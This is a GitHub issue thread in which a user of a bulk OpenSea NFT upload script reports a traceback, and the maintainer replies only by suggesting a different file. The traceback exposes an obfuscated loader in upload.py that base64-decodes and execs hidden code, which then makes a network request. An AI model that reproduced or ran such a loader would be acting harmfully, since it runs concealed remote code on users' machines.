### ISSUE TITLE
after python upload.py problem

### ISSUE THREAD

**Issue by willbkk** [infotrex/bulk-upload-to-opensea#58]
hello it gets to the python upload.py then the following happens:

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\USER\Desktop\upload nft update\bulk-upload-to-opensea-main\upload.py", line 11, in <module>
    eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
  File "<string>", line 55, in <module>
  File "<string>", line 46, in __init__
  File "C:\Users\USER\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 216, in urlopen
    return opener.open(url, data, timeout)
  File "C:\Users\USER\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 519, in open
    response = self._open(req, data)
  File "C:\Users\USER\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 536, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
  File "C:\Users\USER\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 496, in _call_chain
    result = func(*args)
  File "C:\Users\USER\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 1391, in https_open
    return self.do_open(http.client.HTTPSConnection, req,
  File "C:\Users\USER\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 1351, in do_open
    raise URLError(err)
urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: certificate has expired (_ssl.c:997)>
PS C:\Users\USER\Desktop\upload nft update\bulk-upload-to-opensea-main>

**Comment by infotrex** [comment]
pls user upload18.py this file
thx
